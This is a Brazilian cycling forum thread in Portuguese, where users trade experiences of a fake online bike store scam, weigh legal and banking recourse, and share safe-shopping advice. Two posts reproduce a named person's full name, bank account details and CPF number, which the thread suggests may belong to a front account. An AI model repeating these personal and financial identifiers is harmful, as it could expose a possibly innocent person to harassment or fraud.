https://www.strava.com/athletes/18579736" rel="nofollow - https://www.strava.com/athletes/18579736


Postado Por: MarceloNeuriHaag
Data de Publicação: 09 Dez 2019 as 17:11
Eu sou das antigas: praticamente tudo compro em lojas "físicas"... ou encomendo diretamente com um conhecido, mas sou do tempo do bom & velho "olho no olho"... sim, sou atrasado, antiquado & retrógrado, e posso ter gastado um pouco mais em certas compras, mas (ainda!) nunca me arrependi disso...


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 17:16
Originalmente postado por MarceloNeuriHaag MarceloNeuriHaag escreveu:

Eu sou das antigas: praticamente tudo compro em lojas "físicas"... ou encomendo diretamente com um conhecido, mas sou do tempo do bom & velho "olho no olho"... sim, sou atrasado, antiquado & retrógrado, mas (ainda!) nunca me arrependi disso...


ta certo. Na verdade por mais que me julguem (eu mesma estou me julgando no momento), tenho que ter uma coisa em minha cabeça: não sou eu a errada. Infelizmente me bati com essa gente canalha.

Enfim, o valor vai acabar sendo o mesmo que teria sido numa loja confiável, pois eu não vou ficar sem pedalar. Confesso que esse final de semana me deu uma desanimada, deu vontade de vender tudo e desistir, mas não posso fazer isso.


Postado Por: MarceloNeuriHaag
Data de Publicação: 09 Dez 2019 as 17:18
De maneira alguma falei que és a errada. Muito pelo contrário. Mas infelizmente na nossa cultura/sociedade acabamos pagando o preço pelos ruins... por isso sou naturalmente desconfiado. Sou do tempo ainda que levo um maço de dinheiro (papel) e falo: "no Cash tem quanto de desconto"?


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 17:19
Originalmente postado por MarceloNeuriHaag MarceloNeuriHaag escreveu:

De maneira alguma falei que és a errada. Muito pelo contrário. Mas infelizmente na nossa cultura/sociedade acabamos pagando o preço pelos ruins... por isso sou naturalmente desconfiado. Sou do tempo ainda que levo um maço de dinheiro (papel) e falo: "no Cash tem quanto de desconto"?


Eu entendi rsrsrs
To falando pra mim mesma e afirmando que vc ta muito certo! hehehe


Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 17:20
Bola pra frente. Serve de lição.
E agora é comprar outra bike assim que der rs



Postado Por: aianabenet
Data de Publicação: 09 Dez 2019 as 17:44
Originalmente postado por aianabenet aianabenet escreveu:

Bola pra frente. Serve de lição.
E agora é comprar outra bike assim que der rs



Galera, queria agradecer a vcs todos pela disposição.
Se der em alguma coisa vou postando aqui.
Outra coisa, não sei se já existe, mas se não existir, poderíamos ter um tópico fixo sobre lojas fakes ou de péssima qualidade.

Eu pesquisei por semanas pra comprar e acabei caindo num golpe...


Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 18:18
Originalmente postado por zoda zoda escreveu:

Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Já acionei a Caloi. Os emails que antes recebiam nem recebem mais. Inclusive, vou fazer o B.O agora e entrar com ação no Procon. Se quiser me adcionar no whatsapp pra nos falarmos, me avisa.




Procon? Para que se é tudo falso?
Tera que tentar ir contra o banco.
O banco vai alegar que abriram a conta com documentos falsos.



Aí vai arder no banco. O cliente não tem como se responsabilizar por isso.


Postado Por: zoda
Data de Publicação: 09 Dez 2019 as 18:37
Originalmente postado por Fabio Fabio escreveu:

Originalmente postado por zoda zoda escreveu:

Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Não existe essa empresa no prédio... Fazem meses que pessoas ligam na portaria desse prédio à procura dessa empresa que nunca existiu neste endereço.

Já era.


Já acionei a Caloi. Os emails que antes recebiam nem recebem mais. Inclusive, vou fazer o B.O agora e entrar com ação no Procon. Se quiser me adcionar no whatsapp pra nos falarmos, me avisa.




Procon? Para que se é tudo falso?
Tera que tentar ir contra o banco.
O banco vai alegar que abriram a conta com documentos falsos.



Aí vai arder no banco. O cliente não tem como se responsabilizar por isso.


O Banco ressarcir o consumidor que vez uma transferência para uma conta em nome de um laranja? Acho bem difícil


Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 18:42
Respondi incompleto. Se a tal pessoa for cotada e disser que não foi ela quem abriu a tal conta, aí sim vai recair sobre o banco. Independente se vai ressarcir ou não o comprador. Mas aí o banco pode ser processado pela verdadeira pessoa que está como titular da conta.


Postado Por: zoda
Data de Publicação: 09 Dez 2019 as 18:45
Originalmente postado por Fabio Fabio escreveu:

Respondi incompleto. Se a tal pessoa for cotada e disser que não foi ela quem abriu a tal conta, aí sim vai recair sobre o banco. Independente se vai ressarcir ou não o comprador. Mas aí o banco pode ser processado pela verdadeira pessoa que está como titular da conta.


Isso é fácil. QQ pequenas causas resolve. Quanto ao consumidor lesado, esse fica desamparado.


Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 18:48
O consumidor não pode colocar o banco como co-réu, mas pode processar o tal titular, problema é achar endereço. Aí o tal titular se defende após a citação anexando o processo dele junto ao banco.


Postado Por: zoda
Data de Publicação: 09 Dez 2019 as 18:53
Originalmente postado por Fabio Fabio escreveu:

O consumidor não pode colocar o banco como co-réu, mas pode processar o tal titular, problema é achar endereço. Aí o tal titular se defende após a citação anexando o processo dele junto ao banco.

Se o laranja provar que seu nome foi usado indevidamente, a coisa desanda. Aquelas agências populares de currículos são uma fonte para abrir empresa fantasma. País dos espertos. Imagina se fosse mais fácil abrir empresas (está ficando mais fácil, mas ainda tem uma certa burocracia). Os bons sempre pagam pelos malandros nesse país.Depois acham que a desonestidade é exclusiva da classe de políticos. Eles apenas representam nossa sociedade.


Postado Por: Fabio
Data de Publicação: 09 Dez 2019 as 19:31
Difícil é fechar


Postado Por: rowisen
Data de Publicação: 10 Dez 2019 as 07:05
Acabei de ler o tópico agora e percebi que tinha algo errado já quando foi falado que não tinha uma NF envolvida depois de teoricamente o produto ter sido encaminhado pra transportadora. Eu como assíduo comprador virtual nunca vi uma loja online não enviar a NF antes de enviar o produto, já que a NF é gerada antes de qualquer coisa.

No mais, sinto muito por terem caído nesse golpe. Compras pela internet são prazerosas, mas tem alguns cuidados que devem ser tomados para se evitar pesadelos como esse.

Infelizmente vivemos no país da impunidade e isso dá brechas para que cada vez mais se tenha notícia de casos de estelionato.


Postado Por: MarcioRodrigues
Data de Publicação: 10 Dez 2019 as 08:03
Compras ´pela WEB são muito atrativas, justamente pelos valores, empresas físicas tem vários gastos  que acabam embutidos no valor do Produto,  Eu sou comprador ONLINE Assíduo, mais em lojas que não conheco so compro com pagamento por PagueSeguro ou MercadoPago, pois tem como Recorrer, para ter o dinheiro de volta


-------------
IBIS MOJO HD-R 27.5
KHS Alite 2000 26
Cake DLX5 27.5
Caloi Elite 29
Speed |KHS


Postado Por: Pantoja
Data de Publicação: 10 Dez 2019 as 11:18
Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Fabio Fabio escreveu:

Vocês o nome completo e CPF da conta onde foi depositado?


Tenho. Acabei de constatar que no site não aparece mais, tentei comprar via depósito e confirma o pedido já direto sem aparecer a página. O cara deve ter percebido que deu mole e tirou do ar já.
Mas eu tinha um print.

Lucas de Souza Rubio

CAIXA ECONÔMICA FEDERAL

Ag 0927

Conta 63553-9

CPF 458.515.458-29


Capaz do FDP estar lendo esse tópico e ficou esperto.


-------------
Gabriel Hansen - http://bikedemia.blogspot.com


Postado Por: aianabenet
Data de Publicação: 10 Dez 2019 as 11:25
Originalmente postado por Pantoja Pantoja escreveu:

Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por Fabio Fabio escreveu:

Vocês o nome completo e CPF da conta onde foi depositado?


Tenho. Acabei de constatar que no site não aparece mais, tentei comprar via depósito e confirma o pedido já direto sem aparecer a página. O cara deve ter percebido que deu mole e tirou do ar já.
Mas eu tinha um print.

Lucas de Souza Rubio

CAIXA ECONÔMICA FEDERAL

Ag 0927

Conta 63553-9

CPF 458.515.458-29


Capaz do FDP estar lendo esse tópico e ficou esperto.


HAHAH Não duvido. Mas agora já era. Vou ligar na agência dele hoje e vou na delegacia. Tentei fazer o BO online ontem mas pra estelionato tem que ser presencial.


Postado Por: rafael_rtg
Data de Publicação: 10 Dez 2019 as 11:59
Que pena terem caído no golpe... Tomara que consigam reaver o dinheiro..

Como o site ainda esta ativo, ajudem outras pessoas a não caírem neste golpe também... Criem uma denuncia no Reclame aqui, é um do sites mais pesquisados antes de realizar compras, e percebi que ainda não existem reclamações por la... 


-------------
Guia de Speed's, tabela de preços e dicas: https://www.pedal.com.br/forum/speed-road-de-entrada-tabela-de-precos-e-dicas_topic92191.html


Postado Por: Rogersnn
Data de Publicação: 10 Dez 2019 as 12:36
Originalmente postado por aianabenet aianabenet escreveu:

Originalmente postado por MarceloNeuriHaag MarceloNeuriHaag escreveu:

Eu sou das antigas: praticamente tudo compro em lojas "físicas"... ou encomendo diretamente com um conhecido, mas sou do tempo do bom & velho "olho no olho"... sim, sou atrasado, antiquado & retrógrado, mas (ainda!) nunca me arrependi disso...


ta certo. Na verdade por mais que me julguem (eu mesma estou me julgando no momento), tenho que ter uma coisa em minha cabeça: não sou eu a errada. Infelizmente me bati com essa gente canalha.

Enfim, o valor vai acabar sendo o mesmo que teria sido numa loja confiável, pois eu não vou ficar sem pedalar. Confesso que esse final de semana me deu uma desanimada, deu vontade de vender tudo e desistir, mas não posso fazer isso.

Não veja como julgamento, mas como inexperiência nesse tipo de situação. No Brasil a regra para compras online é bem simples, se está com um preço muito baixo, já é motivo para desconfiança.



Postado Por: 90452
Data de Publicação: 10 Dez 2019 as 12:42
Já começou, hehehe...

https://www.reclameaqui.com.br/empresa/era-cycle/lista-reclamacoes/" rel="nofollow - https://www.reclameaqui.com.br/empresa/era-cycle/lista-reclamacoes/


Postado Por: aianabenet
Data de Publicação: 10 Dez 2019 as 12:52
Originalmente postado por rafael_rtg rafael_rtg escreveu:

Que pena terem caído no golpe... Tomara que consigam reaver o dinheiro..

Como o site ainda esta ativo, ajudem outras pessoas a não caírem neste golpe também... Criem uma denuncia no Reclame aqui, é um do sites mais pesquisados antes de realizar compras, e percebi que ainda não existem reclamações por la... 


Verdade, eu ia mesmo fazer, mas na agonia de coletar essas informações acabei esquecendo. Vou fazê-lo agora.


Postado Por: aianabenet
Data de Publicação: 10 Dez 2019 as 13:14
Originalmente postado por sidserra sidserra escreveu:

Já começou, hehehe...

https://www.reclameaqui.com.br/empresa/era-cycle/lista-reclamacoes/ - https://www.reclameaqui.com.br/empresa/era-cycle/lista-reclamacoes/


Como a gente diz aqui: "quero nem saber quem envernizou a barata...!
Alguém vai ser responsabilizado. Nem me importo com dinheiro ou com o tempo que isso vai durar.


Postado Por: ghd
Data de Publicação: 10 Dez 2019 as 13:17
Desculpa a sinceridade e não querendo te desanimar, mas a chance de você reaver seu dinheiro é mínima, próxima de zero.

-------------
https://www.strava.com/athletes/18579736" rel="nofollow - https://www.strava.com/athletes/18579736


Postado Por: aianabenet
Data de Publicação: 10 Dez 2019 as 13:20
Originalmente postado por ghd ghd escreveu:

Desculpa a sinceridade e não querendo te desanimar, mas a chance de você reaver seu dinheiro é mínima, próxima de zero.


Eu to ligada. Eu já aceitei, nem espero isso na verdade. Já me conformei em comprar outra bike e pronto. Tomei meu prejuízo e acabou. Agora que as autoridades precisam investigar precisam.


Postado Por: Paulo Valdevite
Data de Publicação: 10 Dez 2019 as 15:57
Pessoal já trocou o número do andar no site, trocou o número do wtzp também.
Que revolta.....


Postado Por: aianabenet
Data de Publicação: 10 Dez 2019 as 16:02
Originalmente postado por Paulo Valdevite Paulo Valdevite escreveu:

Pessoal já trocou o número do andar no site, trocou o número do wtzp também.
Que revolta.....


Vou na polícia hoje fazer a denúncia e já acionei a caixa econômica. Solicitei o ressarcimento e que a conta seja bloqueada. Tenho todos os documentos aqui, de contato etc.


Postado Por: Fabio
Data de Publicação: 10 Dez 2019 as 16:02
Continua 23 no site. E isso não muda nada se a empresa não existe. E também na Receita continua 23.


Postado Por: Paulo Valdevite
Data de Publicação: 10 Dez 2019 as 16:03
Não era andar 22?


Postado Por: aianabenet
Data de Publicação: 10 Dez 2019 as 16:04
Realmente trocaram todos os telefones.


Postado Por: aianabenet
Data de Publicação: 11 Dez 2019 as 10:44
Mais gente tá reclamando no RECLAME AQUI...
E mais gente vai aparecer... Estou tomando todas as medidas legais já da minha parte.


Postado Por: DricaBranca
Data de Publicação: 17 Dez 2019 as 15:01
Cai no mesmo golpe, comprei uma bicicleta infantil unitoy, fiz o depósito, já se passaram 25 dias, só dizem que esta na transportadora, não informam o nome, encontrei a empresa na Jucesp, ela existe há 3 anos, não tem reclamação, processo nenhun, mas irei fazer o B.O, acho que seria bom você fazer o mesmo, hoje entrei no site, não existe mais, não atendem telefone e nem responde whatsapp.


Postado Por: DricaBranca
Data de Publicação: 17 Dez 2019 as 15:34
Eu achei


Postado Por: DricaBranca
Data de Publicação: 18 Dez 2019 as 11:37
Bom dia, fiz depósito em Nome de Lucas de Souza Rúbio dia 21/11.


Postado Por: DricaBranca
Data de Publicação: 18 Dez 2019 as 11:53
Eu tenho o nome Lucas de Souza Rúbio, depósito realizado em 21/11/2019 Caixa Econômica


Postado Por: aianabenet
Data de Publicação: 18 Dez 2019 as 13:13
Originalmente postado por DricaBranca DricaBranca escreveu:

Eu tenho o nome Lucas de Souza Rúbio, depósito realizado em 21/11/2019 Caixa Econômica


Esse mesmo. Tem vários dados por aqui na conversa; Já fiz o B.O só não recebi ainda.
Aconselho que faça uma denúncia junto a Caixa Economica.
Consegui tirar o site do ar também, junto à plataforma que eles criaram o site.
Agora vou encaminhar as provas pra Caixa Economica.



Imprimir Página | Fechar Janela

Forum Software by Web Wiz Forums® version 12.07 - https://www.webwizforums.com
Copyright ©2001-2024 Web Wiz Ltd. - https://www.webwiz.net